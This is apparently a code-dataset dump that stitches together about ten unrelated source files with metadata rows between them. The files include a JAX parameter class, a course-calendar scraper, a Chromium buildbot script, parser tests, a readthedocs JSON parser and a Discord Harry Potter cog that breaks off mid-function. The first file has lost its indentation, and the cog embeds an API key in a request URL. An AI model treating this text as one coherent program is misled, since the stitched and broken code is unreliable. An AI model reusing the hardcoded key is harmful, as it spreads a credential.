size: the number of design variables
bounds: a (size, 2) array of upper and lower bounds for each parameter.
names: a list of names for variables. If not provided, defaults to
"phi_0", "phi_1", ...
"""
super(BoundedExogenousParameters, self).__init__(size, names)
self.bounds = bounds
# Bounded exogenous parameters can have specific values
self._values = jnp.zeros(self.size)
for idx, bound in enumerate(self.bounds_list):
lb, ub = bound
if lb is not None and ub is not None:
center = (lb + ub) / 2.0
elif lb is not None:
center = lb
elif ub is not None:
center = ub
else:
center = 0.0
self._values = self._values.at[idx].set(center)
def set_values(self, new_values: Union[jnp.ndarray, np.ndarray]):
"""Set the values of these design parameters using the given values.
args:
new_values: the array of new values
"""
self._values = new_values
def get_values(self) -> jnp.ndarray:
"""Return the values of these design parameters."""
return self._values
def get_values_np(self) -> np.ndarray:
"""Return the values of these design parameters."""
return np.array(self._values)
@property
def bounds_list(self) -> Sequence[Tuple[float, float]]:
"""Returns the bounds on the design parameters as a list. Each element
of the list should be a tuple of (lower, upper) bounds.
"""
return [(lb.item(), ub.item()) for lb, ub in self.bounds]
def sample(
self, prng_key: PRNGKeyArray, batch_size: Optional[int] = None
) -> jnp.ndarray:
"""Sample values for these exogenous parameters uniformly from the bounded
region
args:
prng_key: a 2-element JAX array containing the PRNG key used for sampling.
This method will not split the key, it will be consumed.
batch_size: if None (default), return a 1D JAX array with self.size
elements; otherwise, return a 2D JAX array with size
(batch_size, self.size)
"""
# Handle default if no batch size is given
if batch_size is None:
batch_size = 1
shape: Tuple[int, ...] = (batch_size, self.size)
# Sample uniformly on [0, 1), then re-scale and shift to satisfy bounds
sample = jax.random.uniform(prng_key, shape=shape, minval=0, maxval=1)
for dim_idx in range(self.size):
lower, upper = self.bounds[dim_idx]
spread = upper - lower
sample = sample.at[:, dim_idx].set(sample[:, dim_idx] * spread + lower)
# Squeeze to 1 dimension if batch_size is 1
if batch_size == 1:
sample = sample.reshape(-1)
return sample
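# A small sampling sketch for a two-dimensional bounded parameter space; the bounds
# below are illustrative values, not ones defined by this module.
if __name__ == "__main__":
    bounds = jnp.array([[0.0, 1.0], [-2.0, 2.0]])
    phi = BoundedExogenousParameters(size=2, bounds=bounds)
    key = jax.random.PRNGKey(0)
    print(phi.get_values())               # mid-point of each bound by default
    print(phi.sample(key, batch_size=4))  # (4, 2) array, each column within its bounds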
| 35.580952
| 87
| 0.608405
| 3,357
| 0.898555
| 0
| 0
| 290
| 0.077623
| 0
| 0
| 1,701
| 0.4553
|
b7150935db3a2cd174419b41f2e68609597221e8
| 103
|
py
|
Python
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/quickdoc/AncestorClassDocstringForConstructor.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
class Base:
"""Class docstring."""
class Sub(Base):
def __in<the_ref>it__(self):
pass
| 14.714286
| 32
| 0.592233
| 100
| 0.970874
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.213592
|
b7176f2e0dac30c4e5404b6399ccd7f4159c21b1
| 4,955
|
py
|
Python
|
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
courspider/department_calendar.py
|
Zylphrex/courspider
|
bbcd8f71afa3958405f7017890d5fc9ec8d0d4cd
|
[
"MIT"
] | null | null | null |
import re
from courspider.faculty_calendar_resources.department import Department
from courspider.faculty_calendar_resources.url import URL
from courspider.course import Course
class DepartmentCalendar:
def __init__(self, session, url):
"""
Initialize a new Department Calendar for the given url
:param session: The session of the calendar
:type session: Session
:param url: The url to the specified year's calendar
:type url: URL
"""
self.session = session
self.url = url
self.department = DepartmentCalendar.find_department_name(url)
self.courses = []
# regex used for the _find_department method
_department_name = re.compile(r"<h1>(.*)<\/h1>")
@staticmethod
def find_department_name(url):
"""
Return the Department found at the given url
:param url: The url of the department.
:type url: URL
:return: The Department
:rtype: Department
"""
matches = DepartmentCalendar._department_name.\
findall(url.raw_html)
# only a single h1 tag in the html, and it is the department name
return Department(matches[0])
# please don't touch this regular expression without fully understanding it
# it has been adjusted after many iterations after finding strange
# formatting in the raw html, so any changes is not advised
# regular expression used to filter out the course data
regex = r'<a name="([A-Z]{3}\d\d\d[A-Z]\d)"><\/a><span class="strong">\1\s*(.*?)<\/span>(\s*<div>)?\s*(<\/p>)?\s*<\/?(p|div)(.*?)?>(.*?)<\/?(p|div)>(\s*<\/div>)?\s*(<p>)?(\s*<(p|div)>(.*?)<\/(p|div)>)?(\s*<(p|div)>(.*?)<\/(p|div)>)?\s*(<p>)?\s*(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?(Exclusion:\s*(.*?)|Prerequisite:\s*(.*?)|Corequisite:\s*(.*?)|Recommended Preparation:\s*(.*?))?(\s*<br>\s*)?\s*(Distribution Requirement Status:\s*(.*?)\s*)?(<br>)?\s*(Breadth Requirement:\s*(.*?)\s*)?(<br>|<\/?p>)'
_course = re.compile(regex, re.DOTALL)
def get_courses(self):
"""
Returns a list of all the courses in this Department Calendar.
:return: list of all courses in this DepartmentCalendar
:rtype: list[Course]
"""
# if the list has been generated
if self.courses:
return self.courses
# generate list if necessary
courses_data = DepartmentCalendar._course.findall(self.url.raw_html)
for course_data in courses_data:
self.courses.append(self._create_course(course_data))
return self.courses.copy()
def _create_course(self, data):
"""
Create a course object from the data extracted using the above regex
:param data: The data extracted using the above regex
:type data: tuple(str, ...)
:return: A course object
:rtype: Course
"""
# these numbers come from the group numbers from the regex above
# '_course' count them if you wanna
course_code = DepartmentCalendar._erase_html(data[0])
course_name = DepartmentCalendar._erase_html(data[1])
course_description = DepartmentCalendar._erase_html(
data[6] + data[11] + data[15])
exclusion = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 20))
prerequisite = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 21))
corequisite = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 22))
recommended = DepartmentCalendar._erase_html(
DepartmentCalendar._select_data(data, 23))
distribution_requirement = DepartmentCalendar._erase_html(
data[44])
        breadth_requirement = DepartmentCalendar._erase_html(data[47])
print("found course: {}".format(course_code))
return Course(course_code, course_name, course_description,
exclusion, prerequisite, corequisite, recommended,
                      distribution_requirement, breadth_requirement,
self.department)
    @staticmethod
    def _select_data(data, start):
result = ""
for i in range(4):
result += data[start + i * 6]
return result
_tags = re.compile('<.*?>', re.DOTALL)
@staticmethod
def _erase_html(data):
"""
Erases any remaining html tags in the text.
:param data: The raw data
:type data: str
:return: The data after removing remaining html tags
:rtype: str
"""
return DepartmentCalendar._tags.sub('', data)
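# A tiny sketch of the HTML-stripping helper used throughout this class; it is the only
# piece that can be exercised without a live calendar session, and the sample markup
# below is made up for illustration.
if __name__ == '__main__':
    sample = '<span class="strong">CSC108H1 Introduction to Computer Programming</span>'
    print(DepartmentCalendar._erase_html(sample))   # -> CSC108H1 Introduction to Computer Programming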
| 40.284553
| 795
| 0.618365
| 4,775
| 0.963673
| 0
| 0
| 772
| 0.155802
| 0
| 0
| 2,430
| 0.490414
|
b7187d387790af8d5795d75e9899699ce907f9df
| 6,366
|
py
|
Python
|
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-02-03T05:19:48.000Z
|
2021-11-15T15:07:21.000Z
|
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/test/chromedriver/run_buildbot_steps.py
|
devasia1000/chromium
|
919a8a666862fb866a6bb7aa7f3ae8c0442b4828
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs all the buildbot steps for ChromeDriver except for update/compile."""
import optparse
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import urllib2
import zipfile
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(_THIS_DIR, os.pardir, 'pylib'))
from common import chrome_paths
from common import util
import archive
GS_BUCKET = 'gs://chromedriver-prebuilts'
GS_ZIP_PREFIX = 'chromedriver2_prebuilts'
SLAVE_SCRIPT_DIR = os.path.join(_THIS_DIR, os.pardir, os.pardir, os.pardir,
os.pardir, os.pardir, os.pardir, os.pardir,
'scripts', 'slave')
UPLOAD_SCRIPT = os.path.join(SLAVE_SCRIPT_DIR, 'skia', 'upload_to_bucket.py')
DOWNLOAD_SCRIPT = os.path.join(SLAVE_SCRIPT_DIR, 'gsutil_download.py')
def Archive(revision):
print '@@@BUILD_STEP archive@@@'
prebuilts = ['libchromedriver2.so', 'chromedriver2_server',
'chromedriver2_unittests', 'chromedriver2_tests']
build_dir = chrome_paths.GetBuildDir(prebuilts[0:1])
zip_name = '%s_r%s.zip' % (GS_ZIP_PREFIX, revision)
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, zip_name)
print 'Zipping prebuilts %s' % zip_path
f = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)
for prebuilt in prebuilts:
f.write(os.path.join(build_dir, prebuilt), prebuilt)
f.close()
cmd = [
sys.executable,
UPLOAD_SCRIPT,
'--source_filepath=%s' % zip_path,
'--dest_gsbase=%s' % GS_BUCKET
]
if util.RunCommand(cmd):
print '@@@STEP_FAILURE@@@'
def Download():
print '@@@BUILD_STEP Download chromedriver prebuilts@@@'
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, 'chromedriver2_prebuilts.zip')
cmd = [
sys.executable,
DOWNLOAD_SCRIPT,
'--url=%s' % GS_BUCKET,
'--partial-name=%s' % GS_ZIP_PREFIX,
'--dst=%s' % zip_path
]
if util.RunCommand(cmd):
print '@@@STEP_FAILURE@@@'
build_dir = chrome_paths.GetBuildDir(['host_forwarder'])
print 'Unzipping prebuilts %s to %s' % (zip_path, build_dir)
f = zipfile.ZipFile(zip_path, 'r')
f.extractall(build_dir)
f.close()
# Workaround for Python bug: http://bugs.python.org/issue15795
os.chmod(os.path.join(build_dir, 'chromedriver2_server'), 0700)
def MaybeRelease(revision):
# Version is embedded as: const char kChromeDriverVersion[] = "0.1";
with open(os.path.join(_THIS_DIR, 'chrome', 'version.cc'), 'r') as f:
version_line = filter(lambda x: 'kChromeDriverVersion' in x, f.readlines())
version = version_line[0].split('"')[1]
bitness = '32'
if util.IsLinux() and platform.architecture()[0] == '64bit':
bitness = '64'
zip_name = 'chromedriver2_%s%s_%s.zip' % (
util.GetPlatformName(), bitness, version)
site = 'https://code.google.com/p/chromedriver/downloads/list'
s = urllib2.urlopen(site)
downloads = s.read()
s.close()
if zip_name in downloads:
return 0
print '@@@BUILD_STEP releasing %s@@@' % zip_name
if util.IsWindows():
server_orig_name = 'chromedriver2_server.exe'
server_name = 'chromedriver.exe'
else:
server_orig_name = 'chromedriver2_server'
server_name = 'chromedriver'
server = os.path.join(chrome_paths.GetBuildDir([server_orig_name]),
server_orig_name)
print 'Zipping ChromeDriver server', server
temp_dir = util.MakeTempDir()
zip_path = os.path.join(temp_dir, zip_name)
f = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)
f.write(server, server_name)
if util.IsLinux() or util.IsMac():
adb_commands = os.path.join(_THIS_DIR, 'chrome', 'adb_commands.py')
f.write(adb_commands, 'adb_commands.py')
f.close()
cmd = [
sys.executable,
os.path.join(_THIS_DIR, 'third_party', 'googlecode',
'googlecode_upload.py'),
'--summary', 'version of ChromeDriver2 r%s' % revision,
'--project', 'chromedriver',
'--user', 'chromedriver.bot@gmail.com',
'--label', 'Release',
zip_path
]
with open(os.devnull, 'wb') as no_output:
if subprocess.Popen(cmd, stdout=no_output, stderr=no_output).wait():
print '@@@STEP_FAILURE@@@'
def KillChromes():
chrome_map = {
'win': 'chrome.exe',
'mac': 'Chromium',
'linux': 'chrome',
}
if util.IsWindows():
cmd = ['taskkill', '/F', '/IM']
else:
cmd = ['killall', '-9']
cmd.append(chrome_map[util.GetPlatformName()])
util.RunCommand(cmd)
def CleanTmpDir():
tmp_dir = tempfile.gettempdir()
print 'cleaning temp directory:', tmp_dir
for file_name in os.listdir(tmp_dir):
if os.path.isdir(os.path.join(tmp_dir, file_name)):
print 'deleting sub-directory', file_name
shutil.rmtree(os.path.join(tmp_dir, file_name), True)
def WaitForLatestSnapshot(revision):
print '@@@BUILD_STEP wait_for_snapshot@@@'
while True:
snapshot_revision = archive.GetLatestRevision(archive.Site.SNAPSHOT)
if snapshot_revision >= revision:
break
print 'Waiting for snapshot >= %s, found %s' % (revision, snapshot_revision)
time.sleep(60)
print 'Got snapshot revision', snapshot_revision
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--android-package',
help='Application package name, if running tests on Android.')
parser.add_option(
'-r', '--revision', type='string', default=None,
help='Chromium revision')
options, _ = parser.parse_args()
if not options.android_package:
KillChromes()
CleanTmpDir()
if options.android_package:
Download()
else:
if not options.revision:
parser.error('Must supply a --revision')
if util.IsLinux() and platform.architecture()[0] == '64bit':
Archive(options.revision)
WaitForLatestSnapshot(options.revision)
cmd = [
sys.executable,
os.path.join(_THIS_DIR, 'run_all_tests.py'),
]
if options.android_package:
cmd.append('--android-package=' + options.android_package)
passed = (util.RunCommand(cmd) == 0)
if not options.android_package and passed:
MaybeRelease(options.revision)
if __name__ == '__main__':
main()
| 29.887324
| 80
| 0.678291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,884
| 0.295947
|
b718b1cb323c068a0fab21f464ad842ab3d200e7
| 2,924
|
py
|
Python
|
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | null | null | null |
src/TheLanguage/Parser/Expressions/UnitTests/CastExpressionParserInfo_UnitTest.py
|
davidbrownell/DavidBrownell_TheLanguage
|
07170b448a0ebd7fa2325c9ccd4cefdb3cf7eb98
|
[
"BSL-1.0"
] | 1
|
2021-06-18T18:58:57.000Z
|
2021-06-18T18:58:57.000Z
|
# ----------------------------------------------------------------------
# |
# | CastExpressionParserInfo_UnitTest.py
# |
# | David Brownell <db@DavidBrownell.com>
# | 2021-10-04 09:14:16
# |
# ----------------------------------------------------------------------
# |
# | Copyright David Brownell 2021
# | Distributed under the Boost Software License, Version 1.0. See
# | accompanying file LICENSE_1_0.txt or copy at
# | http://www.boost.org/LICENSE_1_0.txt.
# |
# ----------------------------------------------------------------------
"""Unit test for CastExpressionParserInfo.py"""
import os
import pytest
import CommonEnvironment
from CommonEnvironmentEx.Package import InitRelativeImports
# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------
with InitRelativeImports():
from ..CastExpressionParserInfo import *
from ...Common.AutomatedTests import RegionCreator
from ...Types.StandardTypeParserInfo import StandardTypeParserInfo
# ----------------------------------------------------------------------
def test_TypeWithModifierError():
region_creator = RegionCreator()
with pytest.raises(TypeWithModifierError) as ex:
CastExpressionParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(),
],
ExpressionParserInfo([region_creator(container=True)]),
StandardTypeParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(expected_error=True),
],
"TheType",
TypeModifier.val,
),
)
ex = ex.value
assert str(ex) == "Cast expressions may specify a type or a modifier, but not both."
assert ex.Region == region_creator.ExpectedErrorRegion()
# ----------------------------------------------------------------------
def test_InvalidModifierError():
region_creator = RegionCreator()
with pytest.raises(InvalidModifierError) as ex:
CastExpressionParserInfo(
[
region_creator(container=True),
region_creator(),
region_creator(expected_error=True),
],
ExpressionParserInfo([region_creator(container=True),]),
TypeModifier.mutable,
)
ex = ex.value
assert str(ex) == "'mutable' cannot be used in cast expressions; supported values are 'ref', 'val', 'view'."
assert ex.Region == region_creator.ExpectedErrorRegion()
| 34.4
| 113
| 0.499316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,053
| 0.360123
|
b71a0544974b49622ebf65934372dde5c8e554ce
| 363
|
py
|
Python
|
backend/api/models.py
|
pranav2812/9th-inter-iit-traffic-sign
|
27d3f14ce8235d5cdedb4bb2dbaa10e436f9b06b
|
[
"Apache-2.0"
] | 1
|
2021-04-13T07:56:17.000Z
|
2021-04-13T07:56:17.000Z
|
backend/api/models.py
|
Tech-Meet-Solutions/Bosch-CV-9th-InterIIT
|
57f4bd915c4a1e2146a77210e92d756e1cc3722a
|
[
"Apache-2.0"
] | 1
|
2021-04-09T11:52:01.000Z
|
2021-04-09T12:21:36.000Z
|
backend/api/models.py
|
pranav2812/9th-inter-iit-traffic-sign
|
27d3f14ce8235d5cdedb4bb2dbaa10e436f9b06b
|
[
"Apache-2.0"
] | 3
|
2021-04-15T10:43:06.000Z
|
2021-05-16T00:36:39.000Z
|
from django.db import models
class File(models.Model):
id = models.AutoField(primary_key= True)
b64 = models.TextField(blank=False, null=False)
lastedit = models.DateTimeField(auto_now= True)
image_class = models.TextField(blank = True, default = "")
labels = models.TextField(blank = True, default= "")
def __str__(self):
return f"Image no.: {self.id}"
| 33
| 59
| 0.730028
| 332
| 0.914601
| 0
| 0
| 0
| 0
| 0
| 0
| 27
| 0.07438
|
b71ce22664f675b460275b3803f757d02f90c92c
| 189
|
py
|
Python
|
release/Server/__init__.py
|
cdfmlr/readquickly_WeChatSmallApp
|
e489c507bfbf81a9a43872919000b99b803a079c
|
[
"MIT"
] | 2
|
2019-04-03T13:19:32.000Z
|
2019-04-03T23:20:27.000Z
|
release/Server/__init__.py
|
cdfmlr/readquickly_WeChatSmallApp
|
e489c507bfbf81a9a43872919000b99b803a079c
|
[
"MIT"
] | 1
|
2019-04-03T16:44:36.000Z
|
2019-04-03T23:16:35.000Z
|
release/Server/__init__.py
|
A666AHL/readquickly_WeChatSmallApp
|
7324b7bdd7cf6b7a77e127969077d1c84ada189d
|
[
"MIT"
] | 2
|
2019-04-04T08:38:08.000Z
|
2019-04-04T09:01:42.000Z
|
'''
# ReadQuickly backend
```
|-- Server
    |-- __init__.py
    |-- server.py (serves incoming requests)
    |-- content.py (assembles the response data)
    |-- spider (web crawler package)
    |-- weather (weather package)
    |-- notice (notification package)
```
'''
| 12.6
| 28
| 0.449735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 233
| 1
|
b71d1eb99d842362c6523cbc96a06ae382953062
| 1,746
|
py
|
Python
|
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
JB/5.py
|
boostjanbjorge/adventofcode
|
5cdd540a553550b1000496dfa39cbf7cf431a85f
|
[
"MIT"
] | null | null | null |
import collections
import dataclasses
import itertools
@dataclasses.dataclass(frozen=True)
class Point:
x: int
y: int
@dataclasses.dataclass(frozen=True)
class Segment:
start: Point
stop: Point
@property
def slope(self):
dy = self.stop.y - self.start.y
dx = self.stop.x - self.start.x
return dy / dx
@property
def y_intercept(self):
# y = slope * x + b
# b = y - slope * x, x->start.x
return self.start.y - self.slope * self.start.x
def points(self):
min_y = min(self.start.y, self.stop.y)
max_y = max(self.start.y, self.stop.y)
min_x = min(self.start.x, self.stop.x)
max_x = max(self.start.x, self.stop.x)
if self.start.x == self.stop.x:
for y in range(min_y, max_y + 1):
yield Point(self.start.x, y)
else:
for x in range(min_x, max_x + 1):
yield Point(x, round(self.slope * x + self.y_intercept))
def segments():
with open("inputs/5.txt") as f:
points = f.readlines()
points = (p.strip() for p in points)
points = (p.split("->") for p in points)
points = ((p1.split(","), p2.split(",")) for p1, p2 in points)
for (p1x, p1y), (p2x, p2y) in points:
yield Segment(
Point(int(p1x), int(p1y)),
Point(int(p2x), int(p2y)),
)
def count_interception(S: Segment):
cnt = collections.Counter(itertools.chain.from_iterable(s.points() for s in S))
return sum(1 for v in cnt.values() if v > 1)
# 13319, too high
print(
count_interception(
s for s in segments() if s.start.x == s.stop.x or s.start.y == s.stop.y
)
)
# 19172
print(count_interception(segments()))
| 23.594595
| 83
| 0.57331
| 864
| 0.494845
| 862
| 0.4937
| 936
| 0.536082
| 0
| 0
| 97
| 0.055556
|
b71e4d45d0dd84308fd2a62e675360e49475c3fc
| 3,140
|
py
|
Python
|
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
readthedocs/search/parse_json.py
|
darrowco/readthedocs.org
|
fa7fc5a24306f1f6a27c7393f381c594ab29b357
|
[
"MIT"
] | null | null | null |
"""Functions related to converting content into dict/JSON structures."""
import codecs
import json
import logging
from pyquery import PyQuery
log = logging.getLogger(__name__)
def generate_sections_from_pyquery(body):
"""Given a pyquery object, generate section dicts for each section."""
# Capture text inside h1 before the first h2
h1_section = body('.section > h1')
if h1_section:
div = h1_section.parent()
h1_title = h1_section.text().replace('¶', '').strip()
h1_id = div.attr('id')
h1_content = ''
next_p = body('h1').next()
while next_p:
if next_p[0].tag == 'div' and 'class' in next_p[0].attrib:
if 'section' in next_p[0].attrib['class']:
break
h1_content += parse_content(next_p.text())
next_p = next_p.next()
if h1_content:
yield {
'id': h1_id,
'title': h1_title,
'content': h1_content.replace('\n', '. '),
}
# Capture text inside h2's
section_list = body('.section > h2')
for num in range(len(section_list)):
div = section_list.eq(num).parent()
header = section_list.eq(num)
title = header.text().replace('¶', '').strip()
section_id = div.attr('id')
content = div.text()
content = parse_content(content)
yield {
'id': section_id,
'title': title,
'content': content,
}
def process_file(fjson_filename):
"""Read the fjson file from disk and parse it into a structured dict."""
try:
with codecs.open(fjson_filename, encoding='utf-8', mode='r') as f:
file_contents = f.read()
except IOError:
log.info('Unable to read file: %s', fjson_filename)
raise
data = json.loads(file_contents)
sections = []
path = ''
title = ''
if 'current_page_name' in data:
path = data['current_page_name']
else:
log.info('Unable to index file due to no name %s', fjson_filename)
if data.get('body'):
body = PyQuery(data['body'])
sections.extend(generate_sections_from_pyquery(body))
else:
log.info('Unable to index content for: %s', fjson_filename)
if 'title' in data:
title = data['title']
if title.startswith('<'):
title = PyQuery(data['title']).text()
else:
log.info('Unable to index title for: %s', fjson_filename)
return {
'path': path,
'title': title,
'sections': sections,
}
def parse_content(content):
"""
Removes the starting text and ¶.
It removes the starting text from the content
because it contains the title of that content,
which is redundant here.
"""
content = content.replace('¶', '').strip()
    # removing the starting (title) text of each section
content = content.split('\n')
if len(content) > 1: # there were \n
content = content[1:]
# converting newlines to ". "
content = '. '.join([text.strip().rstrip('.') for text in content])
return content
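# Illustrative example (not part of the original module):
#   parse_content('Title¶\nFirst sentence.\nSecond sentence.')
# returns 'First sentence. Second sentence' -- the leading title line and the
# pilcrow markers are dropped, and newlines become '. ' separators.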
| 28.288288
| 76
| 0.576752
| 0
| 0
| 1,335
| 0.424618
| 0
| 0
| 0
| 0
| 933
| 0.296756
|
b71eb8d88a38241242bcf5b67fab2d3309817366
| 8,427
|
py
|
Python
|
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
pottermore/pottermore.py
|
Ricotjhe/kennnyshiwa-cogs
|
5a596f298a6f7fe7502634793384a747060fc6c7
|
[
"MIT"
] | null | null | null |
import contextlib
from redbot.core import commands, Config
from redbot.core.utils.menus import menu, DEFAULT_CONTROLS
import discord
import aiohttp
import random
slytherin = "https://cdn.shopify.com/s/files/1/1325/3287/products/HP8040B_930f8033-607f-41ee-a8e4-fa90871ce7a7.png?v=1546231154"
gryffindor = "https://cdn10.bigcommerce.com/s-9p3fydit/products/370/images/1328/gryff1c__34591.1449620321.1280.1280.PNG?c=2"
ravenclaw = "https://cdn10.bigcommerce.com/s-9p3fydit/products/372/images/1332/raven1c__54237.1449620971.1200.1200.PNG?c=2"
hufflepuff = "https://cdn.shopify.com/s/files/1/0221/1146/products/Hufflepuff_Embroidered_Patch_Scaled_large.png?v=1553528874"
harry = "https://www.freepngimg.com/thumb/harry_potter/5-2-harry-potter-png-file.png"
hermione = "https://66.media.tumblr.com/3ce8453be755f31f93381918985b4918/tumblr_nn2lopIypj1rxkqbso1_1280.png"
voldemort = (
"https://vignette.wikia.nocookie.net/harrypotter/images/6/6e/VoldemortHeadshot_DHP1.png"
)
snape = "https://vignette.wikia.nocookie.net/harrypotter/images/a/a3/Severus_Snape.jpg"
draco = "https://vignette.wikia.nocookie.net/harrypotter/images/7/7e/Draco_Malfoy_TDH.png"
dumbledore = "https://images.ctfassets.net/bxd3o8b291gf/5ocauY6zAsqGiIgeECw06e/8accc1c586d2be7d9de6a3d9aec37b90/AlbusDumbledore_WB_F1_DumbledoreSmiling_Still_080615_Port.jpg"
ron = "https://upload.wikimedia.org/wikipedia/en/thumb/5/5e/Ron_Weasley_poster.jpg/220px-Ron_Weasley_poster.jpg"
hagrid = "https://vignette.wikia.nocookie.net/harrypotter/images/e/ee/Rubeushagrid.PNG/revision/latest?cb=20161123044204"
ginny = "http://hp-intothefire.wdfiles.com/local--files/ginny/ginny.jpg"
sirius = "https://vignette.wikia.nocookie.net/harrypotter/images/7/75/Sirius_Black_profile.jpg/revision/latest?cb=20150918055024"
mcgonagall = "https://vignette.wikia.nocookie.net/harrypotter/images/6/65/ProfessorMcGonagall-HBP.jpg/revision/latest?cb=20100612114856"
class Pottermore(commands.Cog):
"""Lookup information about the Harry Potter Universe"""
__author__ = "kennnyshiwa"
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession(loop=self.bot.loop)
self.config = Config.get_conf(self, 376564057517457408, force_registration=True)
default_user = {"house": None}
self.config.register_user(**default_user)
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def housesort(self, ctx):
"""Find your Harry Potter House"""
if await self.config.user(ctx.author).house() is None:
async with self.session.get("https://www.potterapi.com/v1/sortinghat") as r:
data = await r.json()
house = data
await self.config.user(ctx.author).house.set(str(house))
color = await ctx.embed_color()
house_user = await self.config.user(ctx.author).house()
if house_user == "Slytherin":
image = slytherin
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Gryffindor":
image = gryffindor
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Ravenclaw":
image = ravenclaw
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
if house_user == "Hufflepuff":
image = hufflepuff
embed = discord.Embed(
title="Find your Harry Potter House", description=house_user, color=color
)
embed.set_thumbnail(url=image)
await ctx.send(embed=embed)
@staticmethod
async def do_lookup(query: str) -> list:
"""Run pottermore lookup pic lookup"""
base_url = "https://www.potterapi.com/v1/characters/?key=$2a$10$ZiItg0fhdYll4R2A4hNareLdTmuYByHnzL9mSqw3r7Mkh/nMh2WUa&name=%s"
async with aiohttp.ClientSession() as session:
async with session.get(base_url % query) as r:
data = await r.json()
if not data or isinstance(data, dict):
return None
return data[0]
def escape_query(self, query) -> str:
"""Escape mentions from queries"""
return query.replace("`", "'")
@commands.bot_has_permissions(embed_links=True)
@commands.command()
async def charactersearch(self, ctx, *, query):
"""
        Search for Harry Potter characters.
        Note: Searches are case sensitive and require the full name.
"""
async with ctx.typing():
query = self.escape_query("".join(query))
pottermore_data = await self.do_lookup(query)
if not pottermore_data:
await ctx.send("🔮 Muggle error! Could not find `%s`" % query)
return
if "alias" in pottermore_data:
